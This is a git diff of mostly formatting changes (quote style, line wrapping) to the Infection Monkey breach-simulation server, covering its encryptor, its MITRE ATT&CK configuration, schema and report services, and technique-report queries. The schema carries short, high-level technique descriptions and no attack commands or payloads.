a/monkey/monkey_island/cc/server_utils/custom_json_encoder.py b/monkey/monkey_island/cc/server_utils/custom_json_encoder.py index 3c53586d1..0cc2036de 100644 --- a/monkey/monkey_island/cc/server_utils/custom_json_encoder.py +++ b/monkey/monkey_island/cc/server_utils/custom_json_encoder.py @@ -3,7 +3,6 @@ from flask.json import JSONEncoder class CustomJSONEncoder(JSONEncoder): - def default(self, obj): try: if isinstance(obj, ObjectId): diff --git a/monkey/monkey_island/cc/server_utils/encryptor.py b/monkey/monkey_island/cc/server_utils/encryptor.py index 161032c52..60ab8ead9 100644 --- a/monkey/monkey_island/cc/server_utils/encryptor.py +++ b/monkey/monkey_island/cc/server_utils/encryptor.py @@ -38,20 +38,18 @@ class Encryptor: ) def _unpad(self, message: str): - return message[0:-ord(message[len(message) - 1])] + return message[0 : -ord(message[len(message) - 1])] def enc(self, message: str): cipher_iv = Random.new().read(AES.block_size) cipher = AES.new(self._cipher_key, AES.MODE_CBC, cipher_iv) - return base64.b64encode( - cipher_iv + cipher.encrypt(self._pad(message).encode()) - ).decode() + return base64.b64encode(cipher_iv + cipher.encrypt(self._pad(message).encode())).decode() def dec(self, enc_message): enc_message = base64.b64decode(enc_message) - cipher_iv = enc_message[0:AES.block_size] + cipher_iv = enc_message[0 : AES.block_size] cipher = AES.new(self._cipher_key, AES.MODE_CBC, cipher_iv) - return self._unpad(cipher.decrypt(enc_message[AES.block_size:]).decode()) + return self._unpad(cipher.decrypt(enc_message[AES.block_size :]).decode()) def initialize_encryptor(password_file_dir): diff --git a/monkey/monkey_island/cc/server_utils/island_logger.py b/monkey/monkey_island/cc/server_utils/island_logger.py index 1efbb7734..a32f6505f 100644 --- 
a/monkey/monkey_island/cc/server_utils/island_logger.py +++ b/monkey/monkey_island/cc/server_utils/island_logger.py @@ -40,6 +40,4 @@ def _expanduser_log_file_paths(config: Dict): for handler_settings in handlers.values(): if "filename" in handler_settings: - handler_settings["filename"] = os.path.expanduser( - handler_settings["filename"] - ) + handler_settings["filename"] = os.path.expanduser(handler_settings["filename"]) diff --git a/monkey/monkey_island/cc/services/__init__.py b/monkey/monkey_island/cc/services/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/monkey_island/cc/services/__init__.py +++ b/monkey/monkey_island/cc/services/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/monkey_island/cc/services/attack/__init__.py b/monkey/monkey_island/cc/services/attack/__init__.py index 98867ed4d..4dc53e2ca 100644 --- a/monkey/monkey_island/cc/services/attack/__init__.py +++ b/monkey/monkey_island/cc/services/attack/__init__.py @@ -1 +1 @@ -__author__ = 'VakarisZ' +__author__ = "VakarisZ" diff --git a/monkey/monkey_island/cc/services/attack/attack_config.py b/monkey/monkey_island/cc/services/attack/attack_config.py index 2b9128edc..faff5f71b 100644 --- a/monkey/monkey_island/cc/services/attack/attack_config.py +++ b/monkey/monkey_island/cc/services/attack/attack_config.py @@ -17,7 +17,7 @@ class AttackConfig(object): @staticmethod def get_config(): - config = mongo.db.attack.find_one({'name': 'newconfig'})['properties'] + config = mongo.db.attack.find_one({"name": "newconfig"})["properties"] return config @staticmethod @@ -29,7 +29,7 @@ class AttackConfig(object): """ attack_config = AttackConfig.get_config() for config_key, attack_type in list(attack_config.items()): - for type_key, technique in list(attack_type['properties'].items()): + for type_key, technique in list(attack_type["properties"].items()): if type_key == technique_id: return technique return None @@ -44,7 +44,7 @@ class AttackConfig(object): @staticmethod def update_config(config_json): - mongo.db.attack.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True) + mongo.db.attack.update({"name": "newconfig"}, {"$set": config_json}, upsert=True) return True @staticmethod @@ -68,14 +68,17 @@ class AttackConfig(object): :param monkey_config: Monkey island's configuration :param monkey_schema: Monkey configuration schema """ - for key, definition in list(monkey_schema['definitions'].items()): - for array_field in definition['anyOf']: + for key, definition in list(monkey_schema["definitions"].items()): + for array_field in definition["anyOf"]: # Check if current array field has attack_techniques assigned to it - if 'attack_techniques' in array_field and array_field['attack_techniques']: - should_remove = not AttackConfig.should_enable_field(array_field['attack_techniques'], - attack_techniques) + if "attack_techniques" in array_field and array_field["attack_techniques"]: + should_remove = not AttackConfig.should_enable_field( + array_field["attack_techniques"], attack_techniques + ) # If exploiter's attack technique is disabled, disable the exploiter/scanner/PBA - AttackConfig.r_alter_array(monkey_config, key, array_field['enum'][0], remove=should_remove) + AttackConfig.r_alter_array( + monkey_config, key, array_field["enum"][0], remove=should_remove + ) @staticmethod def set_booleans(attack_techniques, monkey_config, monkey_schema): @@ -85,7 +88,7 @@ class AttackConfig(object): :param monkey_config: Monkey island's configuration :param monkey_schema: 
Monkey configuration schema """ - for key, value in list(monkey_schema['properties'].items()): + for key, value in list(monkey_schema["properties"].items()): AttackConfig.r_set_booleans([key], value, attack_techniques, monkey_config) @staticmethod @@ -101,15 +104,20 @@ class AttackConfig(object): if isinstance(value, dict): dictionary = {} # If 'value' is a boolean value that should be set: - if 'type' in value and value['type'] == 'boolean' \ - and 'attack_techniques' in value and value['attack_techniques']: - AttackConfig.set_bool_conf_val(path, - AttackConfig.should_enable_field(value['attack_techniques'], - attack_techniques), - monkey_config) + if ( + "type" in value + and value["type"] == "boolean" + and "attack_techniques" in value + and value["attack_techniques"] + ): + AttackConfig.set_bool_conf_val( + path, + AttackConfig.should_enable_field(value["attack_techniques"], attack_techniques), + monkey_config, + ) # If 'value' is dict, we go over each of it's fields to search for booleans - elif 'properties' in value: - dictionary = value['properties'] + elif "properties" in value: + dictionary = value["properties"] else: dictionary = value for key, item in list(dictionary.items()): @@ -126,7 +134,7 @@ class AttackConfig(object): :param val: Boolean :param monkey_config: Monkey's configuration """ - util.set(monkey_config, '/'.join(path), val) + util.set(monkey_config, "/".join(path), val) @staticmethod def should_enable_field(field_techniques, users_techniques): @@ -141,7 +149,9 @@ class AttackConfig(object): if not users_techniques[technique]: return False except KeyError: - logger.error("Attack technique %s is defined in schema, but not implemented." % technique) + logger.error( + "Attack technique %s is defined in schema, but not implemented." 
% technique + ) return True @staticmethod @@ -172,8 +182,8 @@ class AttackConfig(object): attack_config = AttackConfig.get_config() techniques = {} for type_name, attack_type in list(attack_config.items()): - for key, technique in list(attack_type['properties'].items()): - techniques[key] = technique['value'] + for key, technique in list(attack_type["properties"].items()): + techniques[key] = technique["value"] return techniques @staticmethod @@ -184,6 +194,9 @@ class AttackConfig(object): attack_config = AttackConfig.get_config() techniques = {} for type_name, attack_type in list(attack_config.items()): - for key, technique in list(attack_type['properties'].items()): - techniques[key] = {'selected': technique['value'], 'type': SCHEMA['properties'][type_name]['title']} + for key, technique in list(attack_type["properties"].items()): + techniques[key] = { + "selected": technique["value"], + "type": SCHEMA["properties"][type_name]["title"], + } return techniques diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py index 572b469c5..5845db502 100644 --- a/monkey/monkey_island/cc/services/attack/attack_report.py +++ b/monkey/monkey_island/cc/services/attack/attack_report.py @@ -3,56 +3,92 @@ import logging from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey from monkey_island.cc.services.attack.attack_config import AttackConfig -from monkey_island.cc.services.attack.technique_reports import (T1003, T1005, T1016, T1018, T1021, T1035, T1041, T1053, - T1059, T1064, T1065, T1075, T1082, T1086, T1087, T1090, - T1099, T1105, T1106, T1107, T1110, T1129, T1136, T1145, - T1146, T1154, T1156, T1158, T1166, T1168, T1188, T1197, - T1210, T1216, T1222, T1504) -from monkey_island.cc.services.reporting.report_generation_synchronisation import safe_generate_attack_report +from monkey_island.cc.services.attack.technique_reports import ( + T1003, + T1005, + T1016, + T1018, + T1021, + T1035, + T1041, + T1053, + T1059, + T1064, + T1065, + T1075, + T1082, + T1086, + T1087, + T1090, + T1099, + T1105, + T1106, + T1107, + T1110, + T1129, + T1136, + T1145, + T1146, + T1154, + T1156, + T1158, + T1166, + T1168, + T1188, + T1197, + T1210, + T1216, + T1222, + T1504, +) +from monkey_island.cc.services.reporting.report_generation_synchronisation import ( + safe_generate_attack_report, +) __author__ = "VakarisZ" LOG = logging.getLogger(__name__) -TECHNIQUES = {'T1210': T1210.T1210, - 'T1197': T1197.T1197, - 'T1110': T1110.T1110, - 'T1075': T1075.T1075, - 'T1003': T1003.T1003, - 'T1059': T1059.T1059, - 'T1086': T1086.T1086, - 'T1082': T1082.T1082, - 'T1145': T1145.T1145, - 'T1065': T1065.T1065, - 'T1105': T1105.T1105, - 'T1035': T1035.T1035, - 'T1129': T1129.T1129, - 'T1106': T1106.T1106, - 'T1107': T1107.T1107, - 'T1188': T1188.T1188, - 'T1090': T1090.T1090, - 'T1041': T1041.T1041, - 'T1222': T1222.T1222, - 'T1005': T1005.T1005, - 'T1018': T1018.T1018, - 'T1016': T1016.T1016, - 'T1021': T1021.T1021, - 'T1064': T1064.T1064, - 'T1136': T1136.T1136, - 'T1156': T1156.T1156, - 'T1504': T1504.T1504, - 'T1158': T1158.T1158, - 'T1154': T1154.T1154, - 'T1166': T1166.T1166, - 'T1168': T1168.T1168, - 'T1053': T1053.T1053, - 'T1099': T1099.T1099, - 'T1216': T1216.T1216, - 'T1087': T1087.T1087, - 'T1146': T1146.T1146 - } +TECHNIQUES = { + "T1210": T1210.T1210, + "T1197": T1197.T1197, + "T1110": T1110.T1110, + "T1075": T1075.T1075, + "T1003": T1003.T1003, + "T1059": T1059.T1059, + "T1086": T1086.T1086, + "T1082": T1082.T1082, + 
"T1145": T1145.T1145, + "T1065": T1065.T1065, + "T1105": T1105.T1105, + "T1035": T1035.T1035, + "T1129": T1129.T1129, + "T1106": T1106.T1106, + "T1107": T1107.T1107, + "T1188": T1188.T1188, + "T1090": T1090.T1090, + "T1041": T1041.T1041, + "T1222": T1222.T1222, + "T1005": T1005.T1005, + "T1018": T1018.T1018, + "T1016": T1016.T1016, + "T1021": T1021.T1021, + "T1064": T1064.T1064, + "T1136": T1136.T1136, + "T1156": T1156.T1156, + "T1504": T1504.T1504, + "T1158": T1158.T1158, + "T1154": T1154.T1154, + "T1166": T1166.T1166, + "T1168": T1168.T1168, + "T1053": T1053.T1053, + "T1099": T1099.T1099, + "T1216": T1216.T1216, + "T1087": T1087.T1087, + "T1146": T1146.T1146, +} -REPORT_NAME = 'new_report' +REPORT_NAME = "new_report" class AttackReportService: @@ -65,21 +101,22 @@ class AttackReportService: Generates new report based on telemetries, replaces old report in db with new one. :return: Report object """ - report = \ - { - 'techniques': {}, - 'meta': {'latest_monkey_modifytime': Monkey.get_latest_modifytime()}, - 'name': REPORT_NAME - } + report = { + "techniques": {}, + "meta": {"latest_monkey_modifytime": Monkey.get_latest_modifytime()}, + "name": REPORT_NAME, + } for tech_id, tech_info in list(AttackConfig.get_techniques_for_report().items()): try: technique_report_data = TECHNIQUES[tech_id].get_report_data() technique_report_data.update(tech_info) - report['techniques'].update({tech_id: technique_report_data}) + report["techniques"].update({tech_id: technique_report_data}) except KeyError as e: - LOG.error("Attack technique does not have it's report component added " - "to attack report service. %s" % e) - mongo.db.attack_report.replace_one({'name': REPORT_NAME}, report, upsert=True) + LOG.error( + "Attack technique does not have it's report component added " + "to attack report service. %s" % e + ) + mongo.db.attack_report.replace_one({"name": REPORT_NAME}, report, upsert=True) return report @staticmethod @@ -89,8 +126,10 @@ class AttackReportService: :return: timestamp of latest attack telem """ return [ - x['timestamp'] for x in - mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1) + x["timestamp"] + for x in mongo.db.telemetry.find({"telem_category": "attack"}) + .sort("timestamp", -1) + .limit(1) ][0] @staticmethod @@ -101,8 +140,8 @@ class AttackReportService: """ if AttackReportService.is_report_generated(): monkey_modifytime = Monkey.get_latest_modifytime() - latest_report = mongo.db.attack_report.find_one({'name': REPORT_NAME}) - report_modifytime = latest_report['meta']['latest_monkey_modifytime'] + latest_report = mongo.db.attack_report.find_one({"name": REPORT_NAME}) + report_modifytime = latest_report["meta"]["latest_monkey_modifytime"] if monkey_modifytime and report_modifytime and monkey_modifytime == report_modifytime: return latest_report @@ -121,4 +160,6 @@ class AttackReportService: def delete_saved_report_if_exists(): delete_result = mongo.db.attack_report.delete_many({}) if mongo.db.attack_report.count_documents({}) != 0: - raise RuntimeError("Attack Report cache not cleared. DeleteResult: " + delete_result.raw_result) + raise RuntimeError( + "Attack Report cache not cleared. 
DeleteResult: " + delete_result.raw_result + ) diff --git a/monkey/monkey_island/cc/services/attack/attack_schema.py b/monkey/monkey_island/cc/services/attack/attack_schema.py index 714e57135..f19295c5a 100644 --- a/monkey/monkey_island/cc/services/attack/attack_schema.py +++ b/monkey/monkey_island/cc/services/attack/attack_schema.py @@ -14,7 +14,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1059", "description": "Adversaries may use command-line interfaces to interact with systems " - "and execute other software during the course of an operation.", + "and execute other software during the course of an operation.", }, "T1129": { "title": "Execution through module load", @@ -23,8 +23,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1129", "description": "The Windows module loader can be instructed to load DLLs from arbitrary " - "local paths and arbitrary Universal Naming Convention (UNC) network paths.", - "depends_on": ["T1078", "T1003"] + "local paths and arbitrary Universal Naming Convention (UNC) network paths.", + "depends_on": ["T1078", "T1003"], }, "T1106": { "title": "Execution through API", @@ -33,8 +33,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1106", "description": "Adversary tools may directly use the Windows application " - "programming interface (API) to execute binaries.", - "depends_on": ["T1210"] + "programming interface (API) to execute binaries.", + "depends_on": ["T1210"], }, "T1086": { "title": "Powershell", @@ -43,7 +43,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1086", "description": "Adversaries can use PowerShell to perform a number of actions," - " including discovery of information and execution of code.", + " including discovery of information and execution of code.", }, "T1064": { "title": "Scripting", @@ -52,7 +52,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1064", "description": "Adversaries may use scripts to aid in operations and " - "perform multiple actions that would otherwise be manual.", + "perform multiple actions that would otherwise be manual.", }, "T1035": { "title": "Service execution", @@ -61,8 +61,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1035", "description": "Adversaries may execute a binary, command, or script via a method " - "that interacts with Windows services, such as the Service Control Manager.", - "depends_on": ["T1210"] + "that interacts with Windows services, such as the Service Control Manager.", + "depends_on": ["T1210"], }, "T1154": { "title": "Trap", @@ -71,8 +71,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1154", "description": "Adversaries can use the trap command to register code to be executed " - "when the shell encounters specific interrupts." 
- } + "when the shell encounters specific interrupts.", + }, }, }, "persistence": { @@ -87,9 +87,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1156", "description": "Adversaries may abuse shell scripts by " - "inserting arbitrary shell commands to gain persistence, which " - "would be executed every time the user logs in or opens a new shell.", - "depends_on": ["T1504"] + "inserting arbitrary shell commands to gain persistence, which " + "would be executed every time the user logs in or opens a new shell.", + "depends_on": ["T1504"], }, "T1136": { "title": "Create account", @@ -98,7 +98,7 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1136", "description": "Adversaries with a sufficient level of access " - "may create a local system, domain, or cloud tenant account." + "may create a local system, domain, or cloud tenant account.", }, "T1158": { "title": "Hidden files and directories", @@ -107,8 +107,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1158", "description": "Adversaries can hide files and folders on the system " - "and evade a typical user or system analysis that does not " - "incorporate investigation of hidden files." + "and evade a typical user or system analysis that does not " + "incorporate investigation of hidden files.", }, "T1168": { "title": "Local job scheduling", @@ -117,9 +117,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1168/", "description": "Linux supports multiple methods for creating pre-scheduled and " - "periodic background jobs. Job scheduling can be used by adversaries to " - "schedule running malicious code at some specified date and time.", - "depends_on": ["T1053"] + "periodic background jobs. Job scheduling can be used by adversaries to " + "schedule running malicious code at some specified date and time.", + "depends_on": ["T1053"], }, "T1504": { "title": "PowerShell profile", @@ -128,9 +128,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1504", "description": "Adversaries may gain persistence and elevate privileges " - "in certain situations by abusing PowerShell profiles which " - "are scripts that run when PowerShell starts.", - "depends_on": ["T1156"] + "in certain situations by abusing PowerShell profiles which " + "are scripts that run when PowerShell starts.", + "depends_on": ["T1156"], }, "T1053": { "title": "Scheduled task", @@ -139,9 +139,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1053", "description": "Windows utilities can be used to schedule programs or scripts to " - "be executed at a date and time. An adversary may use task scheduling to " - "execute programs at system startup or on a scheduled basis for persistence.", - "depends_on": ["T1168"] + "be executed at a date and time. An adversary may use task scheduling to " + "execute programs at system startup or on a scheduled basis for persistence.", + "depends_on": ["T1168"], }, "T1166": { "title": "Setuid and Setgid", @@ -150,9 +150,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1166", "description": "Adversaries can set the setuid or setgid bits to get code running in " - "a different user’s context." 
- } - } + "a different user’s context.", + }, + }, }, "defence_evasion": { "title": "Defence evasion", @@ -166,7 +166,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1197", "description": "Adversaries may abuse BITS to download, execute, " - "and even clean up after running malicious code." + "and even clean up after running malicious code.", }, "T1146": { "title": "Clear command history", @@ -175,7 +175,7 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1146", "description": "Adversaries may clear/disable command history of a compromised " - "account to conceal the actions undertaken during an intrusion." + "account to conceal the actions undertaken during an intrusion.", }, "T1107": { "title": "File Deletion", @@ -184,8 +184,8 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1107", "description": "Adversaries may remove files over the course of an intrusion " - "to keep their footprint low or remove them at the end as part " - "of the post-intrusion cleanup process." + "to keep their footprint low or remove them at the end as part " + "of the post-intrusion cleanup process.", }, "T1222": { "title": "File permissions modification", @@ -193,7 +193,7 @@ SCHEMA = { "value": True, "necessary": True, "link": "https://attack.mitre.org/techniques/T1222", - "description": "Adversaries may modify file permissions/attributes to evade intended DACLs." + "description": "Adversaries may modify file permissions/attributes to evade intended DACLs.", }, "T1099": { "title": "Timestomping", @@ -202,7 +202,7 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1099", "description": "Adversaries may modify file time attributes to hide new/changes to existing " - "files to avoid attention from forensic investigators or file analysis tools." + "files to avoid attention from forensic investigators or file analysis tools.", }, "T1216": { "title": "Signed script proxy execution", @@ -211,9 +211,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1216", "description": "Adversaries may use scripts signed with trusted certificates to " - "proxy execution of malicious files on Windows systems." - } - } + "proxy execution of malicious files on Windows systems.", + }, + }, }, "credential_access": { "title": "Credential access", @@ -227,8 +227,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1110", "description": "Adversaries may use brute force techniques to attempt access to accounts " - "when passwords are unknown or when password hashes are obtained.", - "depends_on": ["T1210", "T1021"] + "when passwords are unknown or when password hashes are obtained.", + "depends_on": ["T1210", "T1021"], }, "T1003": { "title": "Credential dumping", @@ -237,11 +237,11 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1003", "description": "Mapped with T1078 Valid Accounts because both techniques require" - " same credential harvesting modules. " - "Credential dumping is the process of obtaining account login and password " - "information, normally in the form of a hash or a clear text password, " - "from the operating system and software.", - "depends_on": ["T1078"] + " same credential harvesting modules. 
" + "Credential dumping is the process of obtaining account login and password " + "information, normally in the form of a hash or a clear text password, " + "from the operating system and software.", + "depends_on": ["T1078"], }, "T1145": { "title": "Private keys", @@ -250,11 +250,11 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1145", "description": "Adversaries may gather private keys from compromised systems for use in " - "authenticating to Remote Services like SSH or for use in decrypting " - "other collected files such as email.", - "depends_on": ["T1110", "T1210"] - } - } + "authenticating to Remote Services like SSH or for use in decrypting " + "other collected files such as email.", + "depends_on": ["T1110", "T1210"], + }, + }, }, "discovery": { "title": "Discovery", @@ -268,8 +268,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1087", "description": "Adversaries may attempt to get a listing of accounts on a system or " - "within an environment. This information can help adversaries determine which " - "accounts exist to aid in follow-on behavior." + "within an environment. This information can help adversaries determine which " + "accounts exist to aid in follow-on behavior.", }, "T1018": { "title": "Remote System Discovery", @@ -278,7 +278,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1018", "description": "Adversaries will likely attempt to get a listing of other systems by IP address, " - "hostname, or other logical identifier on a network for lateral movement." + "hostname, or other logical identifier on a network for lateral movement.", }, "T1082": { "title": "System information discovery", @@ -288,8 +288,8 @@ SCHEMA = { "link": "https://attack.mitre.org/techniques/T1082", "depends_on": ["T1016", "T1005"], "description": "An adversary may attempt to get detailed information about the " - "operating system and hardware, including version, patches, hotfixes, " - "service packs, and architecture." + "operating system and hardware, including version, patches, hotfixes, " + "service packs, and architecture.", }, "T1016": { "title": "System network configuration discovery", @@ -299,10 +299,10 @@ SCHEMA = { "link": "https://attack.mitre.org/techniques/T1016", "depends_on": ["T1005", "T1082"], "description": "Adversaries will likely look for details about the network configuration " - "and settings of systems they access or through information discovery" - " of remote systems." - } - } + "and settings of systems they access or through information discovery" + " of remote systems.", + }, + }, }, "lateral_movement": { "title": "Lateral movement", @@ -316,8 +316,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1210", "description": "Exploitation of a software vulnerability occurs when an adversary " - "takes advantage of a programming error in a program, service, or within the " - "operating system software or kernel itself to execute adversary-controlled code." + "takes advantage of a programming error in a program, service, or within the " + "operating system software or kernel itself to execute adversary-controlled code.", }, "T1075": { "title": "Pass the hash", @@ -326,7 +326,7 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1075", "description": "Pass the hash (PtH) is a method of authenticating as a user without " - "having access to the user's cleartext password." 
+ "having access to the user's cleartext password.", }, "T1105": { "title": "Remote file copy", @@ -335,7 +335,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1105", "description": "Files may be copied from one system to another to stage " - "adversary tools or other files over the course of an operation." + "adversary tools or other files over the course of an operation.", }, "T1021": { "title": "Remote services", @@ -345,9 +345,9 @@ SCHEMA = { "link": "https://attack.mitre.org/techniques/T1021", "depends_on": ["T1110"], "description": "An adversary may use Valid Accounts to log into a service" - " specifically designed to accept remote connections." - } - } + " specifically designed to accept remote connections.", + }, + }, }, "collection": { "title": "Collection", @@ -362,9 +362,9 @@ SCHEMA = { "link": "https://attack.mitre.org/techniques/T1005", "depends_on": ["T1016", "T1082"], "description": "Sensitive data can be collected from local system sources, such as the file system " - "or databases of information residing on the system prior to Exfiltration." + "or databases of information residing on the system prior to Exfiltration.", } - } + }, }, "command_and_control": { "title": "Command and Control", @@ -378,7 +378,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1090", "description": "A connection proxy is used to direct network traffic between systems " - "or act as an intermediary for network communications." + "or act as an intermediary for network communications.", }, "T1065": { "title": "Uncommonly used port", @@ -387,7 +387,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1065", "description": "Adversaries may conduct C2 communications over a non-standard " - "port to bypass proxies and firewalls that have been improperly configured." + "port to bypass proxies and firewalls that have been improperly configured.", }, "T1188": { "title": "Multi-hop proxy", @@ -396,9 +396,9 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1188", "description": "To disguise the source of malicious traffic, " - "adversaries may chain together multiple proxies." - } - } + "adversaries may chain together multiple proxies.", + }, + }, }, "exfiltration": { "title": "Exfiltration", @@ -411,9 +411,9 @@ SCHEMA = { "value": True, "necessary": True, "link": "https://attack.mitre.org/techniques/T1041", - "description": "Data exfiltration is performed over the Command and Control channel." 
+ "description": "Data exfiltration is performed over the Command and Control channel.", } - } - } - } + }, + }, + }, } diff --git a/monkey/monkey_island/cc/services/attack/mitre_api_interface.py b/monkey/monkey_island/cc/services/attack/mitre_api_interface.py index 25970ad66..fa0707b41 100644 --- a/monkey/monkey_island/cc/services/attack/mitre_api_interface.py +++ b/monkey/monkey_island/cc/services/attack/mitre_api_interface.py @@ -5,42 +5,44 @@ from stix2 import AttackPattern, CourseOfAction, FileSystemSource, Filter class MitreApiInterface: - ATTACK_DATA_PATH = 'monkey_island/cc/services/attack/attack_data/enterprise-attack' + ATTACK_DATA_PATH = "monkey_island/cc/services/attack/attack_data/enterprise-attack" @staticmethod def get_all_mitigations() -> Dict[str, CourseOfAction]: file_system = FileSystemSource(MitreApiInterface.ATTACK_DATA_PATH) - mitigation_filter = [Filter('type', '=', 'course-of-action')] + mitigation_filter = [Filter("type", "=", "course-of-action")] all_mitigations = file_system.query(mitigation_filter) - all_mitigations = {mitigation['id']: mitigation for mitigation in all_mitigations} + all_mitigations = {mitigation["id"]: mitigation for mitigation in all_mitigations} return all_mitigations @staticmethod def get_all_attack_techniques() -> Dict[str, AttackPattern]: file_system = FileSystemSource(MitreApiInterface.ATTACK_DATA_PATH) - technique_filter = [Filter('type', '=', 'attack-pattern')] + technique_filter = [Filter("type", "=", "attack-pattern")] all_techniques = file_system.query(technique_filter) - all_techniques = {technique['id']: technique for technique in all_techniques} + all_techniques = {technique["id"]: technique for technique in all_techniques} return all_techniques @staticmethod def get_technique_and_mitigation_relationships() -> List[CourseOfAction]: file_system = FileSystemSource(MitreApiInterface.ATTACK_DATA_PATH) - technique_filter = [Filter('type', '=', 'relationship'), - Filter('relationship_type', '=', 'mitigates')] + technique_filter = [ + Filter("type", "=", "relationship"), + Filter("relationship_type", "=", "mitigates"), + ] all_techniques = file_system.query(technique_filter) return all_techniques @staticmethod def get_stix2_external_reference_id(stix2_data) -> str: - for reference in stix2_data['external_references']: - if reference['source_name'] == "mitre-attack" and 'external_id' in reference: - return reference['external_id'] - return '' + for reference in stix2_data["external_references"]: + if reference["source_name"] == "mitre-attack" and "external_id" in reference: + return reference["external_id"] + return "" @staticmethod def get_stix2_external_reference_url(stix2_data) -> str: - for reference in stix2_data['external_references']: - if 'url' in reference: - return reference['url'] - return '' + for reference in stix2_data["external_references"]: + if "url" in reference: + return reference["url"] + return "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py index 399be0992..0bf2e649b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py @@ -12,14 +12,24 @@ class T1003(AttackTechnique): scanned_msg = "" used_msg = "Monkey successfully obtained some credentials from systems on the network." 
- query = {'$or': [ - {'telem_category': 'system_info', - '$and': [{'data.credentials': {'$exists': True}}, - {'data.credentials': {'$gt': {}}}]}, # $gt: {} checks if field is not an empty object - {'telem_category': 'exploit', - '$and': [{'data.info.credentials': {'$exists': True}}, - {'data.info.credentials': {'$gt': {}}}]} - ]} + query = { + "$or": [ + { + "telem_category": "system_info", + "$and": [ + {"data.credentials": {"$exists": True}}, + {"data.credentials": {"$gt": {}}}, + ], + }, # $gt: {} checks if field is not an empty object + { + "telem_category": "exploit", + "$and": [ + {"data.info.credentials": {"$exists": True}}, + {"data.info.credentials": {"$gt": {}}}, + ], + }, + ] + } @staticmethod def get_report_data(): @@ -31,11 +41,11 @@ class T1003(AttackTechnique): status = ScanStatus.UNSCANNED.value return (status, []) - data = {'title': T1003.technique_title()} + data = {"title": T1003.technique_title()} status, _ = get_technique_status_and_data() data.update(T1003.get_message_and_status(status)) data.update(T1003.get_mitigation_by_status(status)) - data['stolen_creds'] = ReportService.get_stolen_creds() - data['stolen_creds'].extend(ReportService.get_ssh_keys()) + data["stolen_creds"] = ReportService.get_stolen_creds() + data["stolen_creds"].extend(ReportService.get_ssh_keys()) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py index 78571562a..83d4bc3b6 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py @@ -10,24 +10,45 @@ class T1005(AttackTechnique): scanned_msg = "" used_msg = "Monkey successfully gathered sensitive data from local system." 
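The T1003 query above uses the {"$gt": {}} comparison (called out in the inline comment) to keep only telemetries whose credentials field is a non-empty object. A hedged pymongo sketch of the same find; the connection string and database name are placeholders, the real ones come from the island's configuration:

from pymongo import MongoClient

db = MongoClient("mongodb://localhost:27017")["monkeyisland"]  # assumed connection details

query = {
    "$or": [
        {
            "telem_category": "system_info",
            "$and": [
                {"data.credentials": {"$exists": True}},
                {"data.credentials": {"$gt": {}}},  # non-empty object check
            ],
        },
        {
            "telem_category": "exploit",
            "$and": [
                {"data.info.credentials": {"$exists": True}},
                {"data.info.credentials": {"$gt": {}}},
            ],
        },
    ]
}

for telem in db.telemetry.find(query):
    print(telem["telem_category"], telem.get("timestamp"))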
